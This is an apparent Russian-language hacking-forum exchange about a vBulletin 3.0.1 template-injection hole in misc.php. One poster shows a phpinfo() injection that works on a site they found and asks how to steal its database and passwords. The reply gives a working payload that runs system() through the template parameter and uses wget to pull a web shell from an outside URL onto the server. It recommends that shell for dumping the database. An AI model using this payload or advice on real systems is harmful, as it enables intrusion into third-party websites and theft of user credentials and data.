Нашел глючный vBulletin Version 3.0.1 и ввоже в нем: http://Что-то там/misc.php?do=page&template={${phpinfo()}} И он мне выдает всё [sm=1.gif] Можно ли как-нить с помощью этой дыры спионерить базу, пароли? Если да то каким командами? А то у меня нефига не выходит.
Ну тк заливай шелл нормальный и все! например от ccteam, там есть ф-ии дампа БД… Примерно вот так: misc.php?do=page&template={${system($_GET[cmd])}}&cmd=wget -O shell.php http://путь_до_шелла_который_нада_скачать